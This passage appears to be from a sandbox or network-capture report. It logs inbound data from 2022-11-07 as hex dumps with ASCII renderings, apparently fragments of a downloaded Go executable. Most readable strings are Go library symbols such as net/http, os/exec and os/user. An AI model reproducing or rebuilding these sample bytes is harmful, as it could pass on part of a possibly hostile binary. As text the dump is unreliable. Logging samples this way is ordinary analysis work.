2022-11-07 22:48:55 UTC	4304	IN	Data Raw: b4 02 02 13 01 43 00 00 00 00 00 00 00 80 62 5e 00 00 00 00 00 40 c3 0e 00 10 00 00 00 00 00 00 00 85 c3 0e 00 8f c3 0e 00 94 c3 0e 00 02 00 00 00 00 00 00 02 00 00 00 00 b8 c3 0e 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 76 65 6e 64 6f 72 2f 67 6f 6c 61 6e 67 2e 6f 72 67 2f 78 2f 74 65 78 74 2f 75 6e 69 63 6f 64 65 2f 6e 6f 72 6d 2e 28 2a 72 65 6f 72 64 65 72 42 75 66 66 65 72 29 2e 69 6e 73 65 72 74 4f 72 64 65 72 65 64 00 02 04 30 8c 01 2f 01 30 25 00 98 06 b6 01 00 f2 02 0e 02 0c 04 06 02 07 0c 09 07 08 02 1b 06 08 06 07 02 07 02 0a 02 05 02 0f 02 0a 01 0d 0d 0d 05 0b 00 00 99 01 04 1d 00 00 00 40 63 5e 00 00 00 00 00 20 c4 0e 00 48 00 00 00 00 00 00 00 e4 c4 0e 00 01 c5 0e 00 16 c5 0e 00 03 00 00 00 00 00 00 05 9d 8b 05 00 48 c5 0e 00 52 c5 Data Ascii: Cb^@oovendor/golang.org/x/text/unicode/norm.(*reorderBuffer).insertOrdered0/0%@c^ HHR
2022-11-07 22:48:55 UTC	4320	IN	Data Raw: 00 57 04 0f 00 03 00 00 00 00 00 00 05 d6 05 0f 00 12 06 0f 00 57 06 0f 00 00 00 00 00 a8 2f 70 00 00 00 00 00 78 88 70 00 00 00 00 00 00 00 00 00 00 00 00 00 90 95 73 00 00 00 00 00 84 da 71 00 00 00 00 00 76 65 6e 64 6f 72 2f 67 6f 6c 61 6e 67 2e 6f 72 67 2f 78 2f 6e 65 74 2f 69 64 6e 61 2e 28 2a 50 72 6f 66 69 6c 65 29 2e 70 72 6f 63 65 73 73 00 76 65 6e 64 6f 72 2f 67 6f 6c 61 6e 67 2e 6f 72 67 2f 78 2f 6e 65 74 2f 69 64 6e 61 2e 28 2a 6c 61 62 65 6c 49 74 65 72 29 2e 64 6f 6e 65 00 76 65 6e 64 6f 72 2f 67 6f 6c 61 6e 67 2e 6f 72 67 2f 78 2f 6e 65 74 2f 69 64 6e 61 2e 28 2a 6c 61 62 65 6c 49 74 65 72 29 2e 6e 65 78 74 00 76 65 6e 64 6f 72 2f 67 6f 6c 61 6e 67 2e 6f 72 67 2f 78 2f 6e 65 74 2f 69 64 6e 61 2e 28 2a 6c 61 62 65 6c 49 74 65 72 29 2e 72 65 Data Ascii: WW/pxpsqvendor/golang.org/x/net/idna.(Profile).processvendor/golang.org/x/net/idna.(labelIter).donevendor/golang.org/x/net/idna.(labelIter).nextvendor/golang.org/x/net/idna.(labelIter).re
2022-11-07 22:48:55 UTC	4336	IN	Data Raw: 6e 67 2e 6f 72 67 2f 78 2f 6e 65 74 2f 68 74 74 70 32 2f 68 70 61 63 6b 2e 62 75 69 6c 64 52 6f 6f 74 48 75 66 66 6d 61 6e 4e 6f 64 65 00 76 65 6e 64 6f 72 2f 67 6f 6c 61 6e 67 2e 6f 72 67 2f 78 2f 6e 65 74 2f 68 74 74 70 32 2f 68 70 61 63 6b 2e 6e 65 77 49 6e 74 65 72 6e 61 6c 4e 6f 64 65 00 02 31 d0 10 cd 01 cf 10 01 d0 10 26 cf 10 0a 00 bc 06 af 02 00 96 02 41 08 07 21 49 22 07 02 2c 02 1b 01 20 23 10 22 11 21 05 1a 0a 00 00 09 01 07 02 14 01 06 02 49 01 25 02 67 01 2b 02 05 00 00 4c 02 1d 02 71 01 15 01 40 00 00 48 02 49 01 6e 02 10 01 11 02 05 01 0a 00 00 a0 69 5f 00 00 00 00 00 10 44 0f 00 10 00 00 00 00 00 00 00 43 44 0f 00 53 44 0f 00 58 44 0f 00 03 00 00 00 00 00 00 05 a8 44 0f 00 c9 44 0f 00 da 44 0f 00 00 00 00 00 d8 8e 6f 00 00 00 00 00 a8 a9 Data Ascii: ng.org/x/net/http2/hpack.buildRootHuffmanNodevendor/golang.org/x/net/http2/hpack.newInternalNode1&A!I", #"!I%g+Lq@HIni_DCDSDXDDDDo
2022-11-07 22:48:55 UTC	4352	IN	Data Raw: 86 0a 35 02 06 08 20 05 08 91 05 11 94 05 81 01 05 10 8b 05 0a 92 05 10 91 05 05 8c 05 0f 06 03 05 05 05 07 0d 03 0e 08 0d 03 0e 05 01 07 0b 03 0c 08 02 03 01 05 01 07 09 03 0a 10 02 03 01 05 05 07 03 03 04 08 02 11 02 11 02 03 05 05 01 13 0b 25 f2 05 05 f1 05 06 14 06 03 08 07 05 05 18 09 1b 18 08 17 0c 0b 10 04 08 df 04 11 e2 04 4a 03 0b 04 e1 01 df 04 12 d4 04 08 d5 04 11 d8 04 ff 01 d5 04 0f 92 06 0a 2b 21 39 08 35 20 7d 0b 00 00 09 01 07 02 14 01 06 02 ae 02 01 19 02 0b 01 15 02 63 01 31 02 e4 03 01 11 02 92 06 01 0c 02 13 01 07 02 13 01 0a 02 a7 03 01 1b 02 08 01 2c 02 0c 01 1c 02 0f 01 14 02 15 01 14 02 f9 03 01 15 02 61 01 13 02 ae 02 01 18 02 4c 01 3d 02 24 01 11 02 ef 01 01 bc 01 02 f5 06 01 06 02 05 00 00 96 02 04 2f 02 78 05 30 08 5e 02 37 01 Data Ascii: 5 %J+!95 }c1,aL=$/x0^7
2022-11-07 22:48:55 UTC	4368	IN	Data Raw: 68 74 74 70 32 53 65 74 74 69 6e 67 73 46 72 61 6d 65 29 2e 46 6f 72 65 61 63 68 53 65 74 74 69 6e 67 00 02 1e 50 9d 01 4f 01 50 11 4f 01 50 1d 4f 0a 00 d0 06 f5 01 00 e6 1f 28 02 08 8d 09 0a 90 09 09 49 09 4a 03 49 17 4a 0a 02 38 02 14 06 12 97 09 1d 8a 09 0a 00 00 79 02 6c 02 06 03 0a 00 00 30 02 0a 01 09 04 09 03 03 04 17 03 68 02 1d 01 0a 00 00 e0 7c 60 00 00 00 00 00 c8 c3 0f 00 30 00 00 00 00 00 00 00 36 c4 0f 00 46 c4 0f 00 4b c4 0f 00 03 00 00 00 00 00 00 05 95 c4 0f 00 bd c4 0f 00 ca c4 0f 00 00 00 00 00 00 a3 6f 00 00 00 00 00 30 a6 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 b7 70 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 46 72 61 6d 65 72 29 2e 57 72 69 74 65 53 65 74 74 69 6e 67 73 00 6e 65 74 2f Data Ascii: http2SettingsFrame).ForeachSettingPOPOPO(IJIJ8yl0h\|`06FKo0opnet/http.(*http2Framer).WriteSettingsnet/
2022-11-07 22:48:55 UTC	4384	IN	Data Raw: 00 00 00 00 00 d0 22 70 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 54 72 61 6e 73 70 6f 72 74 29 2e 4e 65 77 43 6c 69 65 6e 74 43 6f 6e 6e 00 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 54 72 61 6e 73 70 6f 72 74 29 2e 64 69 73 61 62 6c 65 4b 65 65 70 41 6c 69 76 65 73 00 02 1a 80 01 67 7f 01 80 01 04 7f 0a 00 d0 06 90 01 00 96 6f 24 02 05 15 10 16 4b 15 02 14 0a 00 00 55 04 31 03 0a 00 00 29 02 10 01 4b 02 02 01 0a 00 60 f5 60 00 00 00 00 00 e8 03 10 00 38 00 00 00 00 00 00 00 b4 04 10 00 cb 04 10 00 07 05 10 00 03 00 00 00 00 00 00 05 4a 06 10 00 b7 06 10 00 f1 06 10 00 00 00 00 00 28 34 70 00 00 00 00 00 a0 47 71 00 00 00 00 00 00 00 00 00 00 00 00 00 60 c9 73 00 00 00 00 00 64 1a 72 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 28 Data Ascii: "pnet/http.(http2Transport).NewClientConnnet/http.(http2Transport).disableKeepAlivesgo$KU1)K``8J(4pGq`sdrnet/http.(
2022-11-07 22:48:55 UTC	4400	IN	Data Raw: 01 34 1c 02 0d 35 0c 36 08 35 3d 38 1e 37 1b 38 14 01 09 35 15 34 0d 33 08 36 0d 01 05 03 0d 2f 08 32 0d 02 06 33 06 3a 01 02 2a 3b 32 2e 0e 2d 08 30 0d 2f 04 30 05 01 05 01 09 2b 15 2e 05 2d 05 0e 1c 05 1d 07 0a 00 00 00 00 00 00 20 98 61 00 00 00 00 00 a0 43 10 00 20 00 00 00 00 00 00 00 ff 43 10 00 10 44 10 00 15 44 10 00 03 00 00 00 00 00 00 05 50 44 10 00 64 44 10 00 75 44 10 00 00 00 00 00 b4 b2 6f 00 00 00 00 00 08 ad 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 90 70 73 00 00 00 00 00 0c 7c 70 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 63 6c 69 65 6e 74 43 6f 6e 6e 52 65 61 64 4c 6f 6f 70 29 2e 65 6e 64 53 74 72 65 61 6d 45 72 72 6f 72 00 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 70 69 70 65 29 2e 63 6c 6f 73 65 57 69 74 68 Data Ascii: 4565=8785436/23:;2.-0/0+.- aC CDDPDdDuDoops\|pnet/http.(http2clientConnReadLoop).endStreamErrornet/http.(*http2pipe).closeWith
2022-11-07 22:48:55 UTC	4416	IN	Data Raw: 0c 7d 0b 1a 03 0e 00 00 65 02 27 01 a3 04 04 41 03 40 06 2c 05 42 08 27 07 f1 02 0a 1c 09 43 0c 32 0b 27 0c 0f 0b 48 00 00 00 00 00 00 20 35 62 00 00 00 00 00 58 83 10 00 40 00 00 00 00 00 00 00 39 3f 01 00 72 83 10 00 76 83 10 00 00 00 00 00 00 00 00 02 14 9e 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 65 72 72 6f 72 52 65 61 64 65 72 2e 52 65 61 64 00 de 06 1e 00 4a 1e 00 00 00 00 00 00 00 00 40 35 62 00 00 00 00 00 b8 83 10 00 38 00 00 00 00 00 00 00 d4 83 10 00 d7 83 10 00 db 83 10 00 00 00 00 00 00 00 00 02 f4 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 28 2a 62 79 74 65 52 65 61 64 65 72 29 2e 52 65 61 64 00 02 79 00 de 06 79 00 5c 0b 06 0a 02 12 04 04 02 0a 02 22 0d 22 00 00 00 00 00 00 00 c0 35 Data Ascii: }e'A@,B'C2'H 5bX@9?rvoonet/http.errorReader.ReadJ@5b8oonet/http.(*byteReader).Readyy\""5
2022-11-07 22:48:55 UTC	4432	IN	Data Raw: 0c 02 2e 01 2e 02 2f 01 05 02 05 00 00 a3 01 04 2b 02 40 02 40 02 17 03 0f 05 0a 00 00 4d 02 08 01 f5 01 02 09 01 2b 00 00 00 00 00 00 40 d2 62 00 00 00 00 00 88 c3 10 00 20 00 00 00 86 01 00 00 b1 c3 10 00 c7 c3 10 00 d8 c3 10 00 03 00 00 00 00 00 00 06 02 c4 10 00 1a c4 10 00 2a c4 10 00 00 00 00 00 94 c1 6f 00 00 00 00 00 d4 cd 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 25 70 00 00 00 00 00 30 9a 6f 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 28 2a 54 72 61 6e 73 70 6f 72 74 29 2e 72 65 70 6c 61 63 65 52 65 71 43 61 6e 63 65 6c 65 72 00 02 1e a0 01 f0 01 9f 01 01 a0 01 59 9f 01 01 a0 01 2b 9f 01 0b 00 e0 06 52 f9 04 08 fa 04 94 02 f9 04 09 fa 04 28 00 cc 11 3a 02 18 b7 10 08 ba 10 16 02 28 02 06 06 0a 02 42 08 25 07 0c 04 2c 09 Data Ascii: ../+@@M+@b oo(%p0onet/http.(Transport).replaceReqCancelerY+R(:(B%,
2022-11-07 22:48:55 UTC	4448	IN	Data Raw: 6f 6e 74 61 69 6e 65 72 2f 6c 69 73 74 2e 28 2a 4c 69 73 74 29 2e 49 6e 69 74 00 63 6f 6e 74 61 69 6e 65 72 2f 6c 69 73 74 2e 4e 65 77 00 02 1e 80 01 b1 02 7f 01 80 01 f7 02 7f 0a 00 e0 06 3f a7 01 93 01 a8 01 8a 01 a7 01 6c a8 01 03 a7 01 6c a8 01 46 a7 01 03 a8 01 0c a7 01 1e a8 01 27 00 9a 2c 28 02 0f 08 08 f9 29 01 7b 0a 7e 01 59 36 15 16 02 13 02 03 12 05 0f 18 02 04 02 04 e0 2a 34 06 40 02 0a 01 0c e9 2a 04 10 03 0f 08 02 09 01 05 03 05 14 03 11 08 02 03 03 05 01 04 16 03 15 0d 02 06 01 05 16 15 15 03 ea 2a 03 d3 2a 05 61 0c 02 04 02 08 3c 05 3f 08 02 10 02 03 03 02 0e 15 0d 0c 02 04 02 08 aa 2b 13 02 1b 04 03 03 15 a1 2b 03 a0 2b 0c ad 2b 08 02 11 02 03 03 02 b8 2b 1d 0d 0a 00 00 09 01 07 02 04 01 06 02 51 01 2c 02 03 01 13 02 0a 01 17 02 67 01 11 Data Ascii: ontainer/list.(List).Initcontainer/list.New?llF',(){~Y64@***a<?+++++Q,g
2022-11-07 22:48:55 UTC	4464	IN	Data Raw: 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 57 69 6e 64 6f 77 55 70 64 61 74 65 46 72 61 6d 65 29 2e 48 65 61 64 65 72 00 00 00 00 00 00 00 20 ff 63 00 00 00 00 00 70 43 11 00 18 00 00 00 00 00 00 00 d5 39 11 00 27 ba 07 00 2b ba 07 00 02 00 00 00 16 00 00 02 de 39 11 00 ed 39 11 00 e4 9d 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 57 69 6e 64 6f 77 55 70 64 61 74 65 46 72 61 6d 65 29 2e 53 74 72 69 6e 67 00 00 00 00 00 00 00 c0 ff 63 00 00 00 00 00 d8 43 11 00 08 00 00 00 00 00 00 00 7c 34 01 00 c3 e8 08 00 c6 e8 08 00 00 00 00 00 16 00 00 02 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 57 69 6e 64 6f 77 55 70 64 61 Data Ascii: onet/http.(http2WindowUpdateFrame).Header cpC9'+99oonet/http.(http2WindowUpdateFrame).StringcC\|4oonet/http.(*http2WindowUpda
2022-11-07 22:48:55 UTC	4480	IN	Data Raw: 02 05 00 00 39 04 44 02 4e 01 96 01 03 0a 00 00 00 00 00 00 00 e0 50 64 00 00 00 00 00 48 83 11 00 68 00 00 00 00 00 00 00 58 83 11 00 69 83 11 00 6e 83 11 00 02 00 00 00 00 00 00 02 b6 83 11 00 df 83 11 00 34 e8 6f 00 00 00 00 00 24 af 6f 00 00 00 00 00 6f 73 2f 75 73 65 72 2e 6e 65 77 55 73 65 72 00 02 1e f0 01 b2 03 ef 01 01 f0 01 ab 01 ef 01 0e 00 e6 06 8a 05 00 e8 02 28 02 6a 02 56 02 09 01 0a 08 15 02 24 02 25 02 1f 02 1b 02 21 04 1d 03 04 09 03 0a 10 04 03 03 02 01 04 07 03 08 11 02 03 01 02 01 04 05 03 06 0d 02 03 01 05 01 04 03 03 04 10 02 03 01 05 01 12 05 26 07 0d 00 00 09 01 07 02 04 01 06 02 82 02 01 18 02 0c 01 19 02 09 01 16 02 09 01 12 02 0c 01 15 02 1d 01 86 01 02 26 01 08 02 05 00 00 79 02 56 02 37 02 f7 02 05 0d 00 00 00 00 00 00 80 53 Data Ascii: 9DNPdHhXin4o$oos/user.newUser(jV$%!&&yV7S
2022-11-07 22:48:55 UTC	4496	IN	Data Raw: ec 06 ca 13 00 f6 18 36 02 47 02 01 a5 17 0c 02 09 01 08 04 15 02 23 0a 0b 98 17 09 02 29 05 04 0c 14 04 15 08 0b 02 1b 08 07 b5 17 08 9a 17 08 a4 01 05 87 01 12 04 0a 50 08 49 03 7c 0b 01 09 2f 08 4f 06 84 01 05 03 08 7f 19 06 23 7a 18 6b 15 18 4a 02 09 06 09 0c 70 3f 06 80 01 06 3b 05 0c 6e 0a 15 09 02 4f 0d 6e 12 02 42 6f 0d 80 01 06 7f 05 74 44 23 04 0e 0c 01 03 02 05 01 04 02 45 06 08 10 02 73 03 70 04 0b 05 02 1f 02 94 01 07 2b 0d 2b 21 2b 19 45 02 05 06 09 0e 30 0d 05 03 30 13 10 02 28 02 af 01 09 0d 06 03 05 0e 80 01 08 05 1f 06 11 02 18 02 0a 06 1d 02 16 02 38 03 0f 03 2c 05 10 7f 0b 19 05 9f 17 03 9a 17 03 05 03 06 08 05 04 26 03 03 03 1b 05 a9 17 07 04 08 02 15 aa 17 08 0b 08 26 05 19 08 04 08 0b 08 a3 17 05 06 15 02 0c a4 17 08 0b 08 26 05 19 Data Ascii: 6G#)PI\|/O#zkJp?;nOnBotD#Esp++!+E00(8,&&&
2022-11-07 22:48:55 UTC	4512	IN	Data Raw: 95 01 01 05 02 05 00 00 eb 03 04 7a 02 b0 01 02 84 02 02 3a 09 57 0c 44 02 b8 01 02 60 0f 0a 00 00 d3 08 02 2c 01 0b 02 0b 01 03 02 02 01 05 02 7d 01 15 02 05 01 08 02 13 01 bf 01 00 e0 cf 65 00 00 00 00 00 90 03 12 00 08 00 00 00 00 00 00 00 aa 03 12 00 b5 03 12 00 ba 03 12 00 03 00 00 00 00 00 00 05 ee 03 12 00 09 04 12 00 11 04 12 00 00 00 00 00 ac 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 2a 70 00 00 00 00 00 72 65 67 65 78 70 2e 66 72 65 65 4f 6e 65 50 61 73 73 4d 61 63 68 69 6e 65 00 02 1e 40 56 3f 01 40 7a 3f 0a 00 f8 06 f9 01 00 90 06 28 02 09 f7 04 02 02 17 f8 04 21 02 0a f9 04 09 02 07 02 21 f0 04 03 ef 04 0a f4 04 03 f3 04 02 04 22 ec 04 03 eb 04 0a f0 04 03 ef 04 05 ec 04 0a 00 00 09 01 07 Data Ascii: z:WD`,}eood*pregexp.freeOnePassMachine@V?@z?(!!"
2022-11-07 22:48:55 UTC	4528	IN	Data Raw: 00 00 00 00 02 34 9c 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 6f 73 2f 65 78 65 63 2e 69 6e 69 74 2e 30 2e 66 75 6e 63 31 00 02 b2 01 00 80 07 b2 01 00 26 20 02 06 02 2a 02 25 03 05 04 2c 01 07 03 05 00 00 00 75 66 00 00 00 00 00 78 43 12 00 00 00 00 00 00 00 00 00 67 9f 07 00 85 43 12 00 89 43 12 00 02 00 00 00 00 00 00 02 7a 9f 07 00 8d 9f 07 00 b8 8e 6f 00 00 00 00 00 b8 8e 6f 00 00 00 00 00 6f 73 2f 65 78 65 63 2e 69 6e 69 74 00 82 07 7d 00 20 7d 00 00 00 00 00 80 75 66 00 00 00 00 00 c8 43 12 00 18 00 00 00 00 00 00 00 e6 36 01 00 99 ba 07 00 9c ba 07 00 00 00 00 00 16 00 00 02 e4 9d 6f 00 00 00 00 00 c8 8e 6f 00 00 00 00 00 6f 73 2f 65 78 65 63 2e 28 2a 45 78 69 74 45 72 72 6f 72 29 2e 53 74 72 69 6e 67 00 00 00 00 00 a0 75 66 00 00 00 00 00 20 44 Data Ascii: 4ooos/exec.init.0.func1& %,ufxCgCCzooos/exec.init} }ufC6ooos/exec.(ExitError).Stringuf D
2022-11-07 22:48:55 UTC	4544	IN	Data Raw: 73 32 35 35 31 39 2e 67 6f 00 2f 75 73 72 2f 6c 69 62 2f 67 6f 2d 31 2e 31 35 2f 73 72 63 2f 63 72 79 70 74 6f 2f 65 63 64 73 61 2f 65 63 64 73 61 5f 6e 6f 61 73 6d 2e 67 6f 00 2f 75 73 72 2f 6c 69 62 2f 67 6f 2d 31 2e 31 35 2f 73 72 63 2f 63 72 79 70 74 6f 2f 65 63 64 73 61 2f 65 63 64 73 61 2e 67 6f 00 2f 75 73 72 2f 6c 69 62 2f 67 6f 2d 31 2e 31 35 2f 73 72 63 2f 76 65 6e 64 6f 72 2f 67 6f 6c 61 6e 67 2e 6f 72 67 2f 78 2f 63 72 79 70 74 6f 2f 63 72 79 70 74 6f 62 79 74 65 2f 73 74 72 69 6e 67 2e 67 6f 00 2f 75 73 72 2f 6c 69 62 2f 67 6f 2d 31 2e 31 35 2f 73 72 63 2f 76 65 6e 64 6f 72 2f 67 6f 6c 61 6e 67 2e 6f 72 67 2f 78 2f 63 72 79 70 74 6f 2f 63 72 79 70 74 6f 62 79 74 65 2f 62 75 69 6c 64 65 72 2e 67 6f 00 2f 75 73 72 2f 6c 69 62 2f 67 6f 2d 31 2e Data Ascii: s25519.go/usr/lib/go-1.15/src/crypto/ecdsa/ecdsa_noasm.go/usr/lib/go-1.15/src/crypto/ecdsa/ecdsa.go/usr/lib/go-1.15/src/vendor/golang.org/x/crypto/cryptobyte/string.go/usr/lib/go-1.15/src/vendor/golang.org/x/crypto/cryptobyte/builder.go/usr/lib/go-1.
2022-11-07 22:48:55 UTC	4560	IN	Data Raw: 00 00 00 00 00 60 54 87 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 6e 87 00 00 00 00 00 cf 21 ad 74 e5 9a 61 11 be 1d 8c 02 1e 65 b8 91 c2 a2 11 16 7a bb 8c 5e 07 9e 09 e2 c8 a8 33 9c 01 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 65 00 00 00 00 00 00 00 70 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 1d 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 1d 00 00 00 00 00 00 00 1e 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 04 00 Data Ascii: `Tn!taez^3ep
2022-11-07 22:48:55 UTC	4576	IN	Data Raw: 00 00 00 00 00 00 a2 87 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 80 75 87 00 00 00 00 00 00 6f 87 00 00 00 00 00 c0 64 87 00 00 00 00 00 80 55 87 00 00 00 00 00 c0 75 87 00 00 00 00 00 c0 55 87 00 00 00 00 00 40 73 87 00 00 00 00 00 c0 6e 87 00 00 00 00 00 e0 14 66 00 00 00 00 00 01 0a 03 0a 01 00 05 0a 0a 0a 01 00 0f 0a 10 0a 01 00 13 0a 28 0a 01 00 2a 0a 30 0a 01 00 32 0a 33 0a 01 00 35 0a 36 0a 01 00 38 0a 39 0a 01 00 3c 0a 3e 0a 02 00 3f 0a 42 0a 01 00 47 0a 48 0a 01 00 4b 0a 4d 0a 01 00 51 0a 59 0a 08 00 5a 0a 5c 0a 01 00 5e 0a 66 0a 08 00 67 0a 76 0a 01 00 00 0a 01 00 03 0a 01 00 01 00 00 00 05 0a 01 00 06 0a 01 00 01 00 00 00 0c 0a 01 00 13 0a 01 00 01 00 00 00 15 0a 01 00 17 0a 01 00 01 00 00 00 19 0a Data Ascii: uodUuU@snf(*0235689<>?BGHKMQYZ\^fgv
2022-11-07 22:48:55 UTC	4592	IN	Data Raw: 02 01 00 74 03 7e 03 0a 00 85 03 87 03 02 00 89 05 05 06 7c 00 0c 06 1b 06 0f 00 1f 06 40 06 21 00 dd 06 e2 08 05 02 64 09 65 09 01 00 3f 0e d5 0f 96 01 d6 0f d8 0f 01 00 fb 10 eb 16 f0 05 ec 16 ed 16 01 00 35 17 36 17 01 00 02 18 03 18 01 00 05 18 d3 1c ce 04 e1 1c e9 1c 08 00 ea 1c ec 1c 01 00 ee 1c f3 1c 01 00 f5 1c f7 1c 01 00 fa 1c 00 20 06 03 01 20 0b 20 01 00 0e 20 64 20 01 00 66 20 70 20 01 00 74 20 7e 20 01 00 80 20 8e 20 01 00 a0 20 bf 20 01 00 00 21 25 21 01 00 27 21 29 21 01 00 2c 21 31 21 01 00 33 21 4d 21 01 00 4f 21 5f 21 01 00 89 21 8b 21 01 00 90 21 26 24 01 00 40 24 4a 24 01 00 60 24 ff 27 01 00 00 29 73 2b 01 00 76 2b 95 2b 01 00 98 2b ff 2b 01 00 00 2e 4f 2e 01 00 f0 2f fb 2f 01 00 00 30 04 30 01 00 06 30 08 30 02 00 09 30 20 30 01 00 Data Ascii: t~\|@!de?56 d f p t ~ !%!'!)!,!1!3!M!O!_!!!!&$@$J$`$')s+v++++.O.//00000 0
2022-11-07 22:48:55 UTC	4608	IN	Data Raw: 19 30 19 3b 19 40 19 40 19 44 19 6d 19 70 19 74 19 80 19 ab 19 b0 19 c9 19 d0 19 da 19 de 19 1b 1a 1e 1a 7c 1a 7f 1a 89 1a 90 1a 99 1a a0 1a ad 1a b0 1a be 1a 00 1b 4b 1b 50 1b 7c 1b 80 1b f3 1b fc 1b 37 1c 3b 1c 49 1c 4d 1c 88 1c 90 1c ba 1c bd 1c c7 1c d0 1c fa 1c 00 1d 15 1f 18 1f 1d 1f 20 1f 45 1f 48 1f 4d 1f 50 1f 7d 1f 80 1f d3 1f d6 1f ef 1f f2 1f fe 1f 10 20 27 20 30 20 5e 20 70 20 71 20 74 20 9c 20 a0 20 bf 20 d0 20 f0 20 00 21 8b 21 90 21 26 24 40 24 4a 24 60 24 73 2b 76 2b 95 2b 98 2b f3 2c f9 2c 27 2d 2d 2d 2d 2d 30 2d 67 2d 6f 2d 70 2d 7f 2d 96 2d a0 2d 4f 2e 80 2e f3 2e 00 2f d5 2f f0 2f fb 2f 01 30 96 30 99 30 ff 30 05 31 ba 31 c0 31 e3 31 f0 31 b5 4d c0 4d ef 9f 00 a0 8c a4 90 a4 c6 a4 d0 a4 2b a6 40 a6 f7 a6 00 a7 bf a7 c2 a7 c6 a7 f7 a7 Data Ascii: 0;@@Dmpt\|KP\|7;IM EHMP} ' 0 ^ p q t !!!&$@$J$`$s+v+++,,'-----0-g-o-p----O...////000011111MM+@
2022-11-07 22:48:55 UTC	4624	IN	Data Raw: 0a 00 00 0b 35 36 0c 00 37 38 39 00 3a 02 03 04 05 00 00 00 00 00 00 06 07 08 09 00 0a 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 3c 00 0d 3d 3e 3f 40 41 42 43 44 3f 45 46 47 00 48 49 4a 4b 4c 00 4d 4e 4f 50 51 52 53 54 55 56 00 57 00 58 59 5a 5b 00 00 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5d 00 00 5e 00 00 5f 00 60 00 00 00 61 62 63 00 0e 64 65 66 67 00 00 68 00 00 00 0f 10 11 12 13 14 15 16 17 69 00 00 6a 6b 00 6c 6d 6e 18 19 6f 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 00 00 00 00 00 00 00 72 00 73 00 74 00 00 00 00 00 00 00 00 75 1a 1b 1c 76 77 00 00 00 78 00 00 79 7a 00 00 00 00 Data Ascii: 56789:;<=>?@ABCD?EFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz
2022-11-07 22:48:55 UTC	4640	IN	Data Raw: a9 e4 a9 01 00 e6 a9 ef a9 01 00 fa a9 fe a9 01 00 00 aa 28 aa 01 00 40 aa 42 aa 01 00 44 aa 4b aa 01 00 60 aa 76 aa 01 00 7a aa 7e aa 04 00 7f aa af aa 01 00 b1 aa b5 aa 04 00 b6 aa b9 aa 03 00 ba aa bd aa 01 00 c0 aa c2 aa 02 00 db aa dd aa 01 00 e0 aa ea aa 01 00 f2 aa f4 aa 01 00 01 ab 06 ab 01 00 09 ab 0e ab 01 00 11 ab 16 ab 01 00 20 ab 26 ab 01 00 28 ab 2e ab 01 00 30 ab 5a ab 01 00 5c ab 67 ab 01 00 70 ab e2 ab 01 00 00 ac a3 d7 01 00 b0 d7 c6 d7 01 00 cb d7 fb d7 01 00 00 f9 6d fa 01 00 70 fa d9 fa 01 00 00 fb 06 fb 01 00 13 fb 17 fb 01 00 1d fb 1f fb 02 00 20 fb 28 fb 01 00 2a fb 36 fb 01 00 38 fb 3c fb 01 00 3e fb 40 fb 02 00 41 fb 43 fb 02 00 44 fb 46 fb 02 00 47 fb b1 fb 01 00 d3 fb 3d fd 01 00 50 fd 8f fd 01 00 92 fd c7 fd 01 00 f0 fd fb fd Data Ascii: (@BDK`vz~ &(.0Z\gpmp (*68<>@ACDFG=P
